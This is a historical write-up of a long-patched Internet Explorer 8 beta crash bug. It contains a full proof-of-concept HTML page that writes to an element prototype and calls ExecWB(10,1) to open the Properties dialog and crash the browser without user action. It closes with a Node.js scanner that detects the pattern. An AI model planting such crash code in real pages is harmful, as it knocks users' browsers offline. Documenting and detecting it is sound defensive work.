A straightforward crash: if any JavaScript prototype was modified — even just adding an arbitrary property like HTMLDivElement.prototype.ANYTHING = 777 — and then the browser’s Properties dialog was opened (via File > Properties, or via ExecWB), IE8 would crash completely, taking all open tabs with it.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_IE8_Prototype_Properties</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>DoS_IE8_Prototype_Properties</h2>
</center>
If we set <u>any prototype of any element</u>, the browser will crash (no recovery) when showing the Properties dialog (in the menu bar, File --> Properties).<br />
The bad thing is that we can also fire the Properties dialog via JS, so we don't need user interaction. <br /><br />
<hr />
<font color="blue">HTMLDivElement</font>.<b>prototype</b>.<font color="blue">ANYTHING = 777;</font><br /><br />
<font color="green">
// We now fire the properties dialog by using the ExecWB of any IFRAME (IFRAME as wbControl trick).<br />
// But this is not the tricky part, because the crash will work even if you<br />
// comment out the ExecWB line and go to the properties dialog by yourself.<br />
// (Menu Bar --> File --> Properties)
</font>
<br /><br />
<font color="red">&lt;iframe id="wbControl"&gt;&lt;/iframe&gt;</font><br />
document.all.wbControl.<b>ExecWB(10,1)</b>;
<hr />
30% of the time IE tries to recover the tabs and thinks it succeeded, but the truth is that the
recovered tabs are frozen. So, <b>the full browser will crash, with all the opened tabs</b>.
<iframe id="wbControl" width="10" height="10"></iframe>
<input type="button" onclick="crashMe()" value="Crash Me" />
<script language="JavaScript">
function crashMe()
{
    // We do it with the DIV Elements, but it does not matter.
    // We can do it with any object prototype.
    HTMLDivElement.prototype.ANYTHING = 777;
    // We now fire the properties dialog by using the ExecWB of any IFRAME (IFRAME as wbControl trick).
    // But this is not the tricky part, because the crash will work even if you
    // comment out this next line and then go to the properties dialog by yourself.
    // (Menu Bar --> File --> Properties)
    document.all.wbControl.ExecWB(10,1);
}
</script>
<br /><br />
Tested on IE 8.0.6001.18241 [Public Beta2]
</font>
</body>
</html>
The crash happened because the Properties dialog tried to enumerate the element’s prototype chain and encountered the unexpected custom property in a context that wasn’t prepared for it. The script-triggered version used the same ExecWB trick with IDM_PROPERTIES (command ID 10) to open the dialog without any user action. About 30% of the time IE would attempt a tab recovery but the recovered tabs would be frozen and unusable. Tested on IE 8.0.6001.18241 Public Beta 2.
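The two conditions described above (a write to an element prototype, and a script call to ExecWB with command ID 10) can be looked for statically in page source. The following is an added example, not code from the original page: a Node.js triage sketch in which `scanSource`, the verdict strings, and the restriction to `HTML*Element`/`Element` interfaces are assumptions, and the sample input is constructed from the snippet shown on this page.

```javascript
// Added example: static triage for the two ingredients this page describes.
// scanSource, the verdict strings and the finding shape are assumptions of this sketch.

// Subset of OLECMDID values accepted by ExecWB (10 is the Properties dialog).
const OLECMDID_NAMES = { 4: 'SAVEAS', 6: 'PRINT', 7: 'PRINTPREVIEW', 8: 'PAGESETUP', 10: 'PROPERTIES' };

// Crude comment stripping so a commented-out ExecWB line is not counted.
// Assumption: good enough for triage; it does not understand string literals.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '').replace(/\/\/[^\n]*/g, '');
}

function scanSource(src) {
  const code = stripComments(src);
  const protoWrites = [];
  const execCalls = [];
  // Assignments such as HTMLDivElement.prototype.ANYTHING = 777 (not == / === tests).
  const protoRe = /\b(HTML\w*Element|Element)\.prototype\.(\w+)\s*=(?!=)/g;
  // Calls such as document.all.wbControl.ExecWB(10,1).
  const execRe = /\.ExecWB\s*\(\s*(\d+)\s*,\s*(\d+)/g;
  let m;
  while ((m = protoRe.exec(code)) !== null) protoWrites.push({ iface: m[1], prop: m[2] });
  while ((m = execRe.exec(code)) !== null) {
    const cmd = Number(m[1]);
    execCalls.push({ cmd, name: OLECMDID_NAMES[cmd] || 'OTHER', opt: Number(m[2]) });
  }
  const opensProperties = execCalls.some((c) => c.cmd === 10);
  let verdict = 'clean';
  if (protoWrites.length && opensProperties) verdict = 'prototype-write+scripted-properties';
  else if (protoWrites.length) verdict = 'prototype-write-only'; // needs File > Properties by hand
  else if (execCalls.length) verdict = 'scripted-dialog-only';
  return { verdict, protoWrites, execCalls };
}

// Constructed sample: the script body shown on this page.
const PAGE_SNIPPET = `
function crashMe() {
  // We do it with the DIV Elements, but it does not matter.
  HTMLDivElement.prototype.ANYTHING = 777;
  document.all.wbControl.ExecWB(10,1);
}`;

console.log(JSON.stringify(scanSource(PAGE_SNIPPET), null, 2));
```

The `prototype-write-only` verdict covers the case the page calls out, where the ExecWB line is commented out and the dialog is opened by hand.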
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.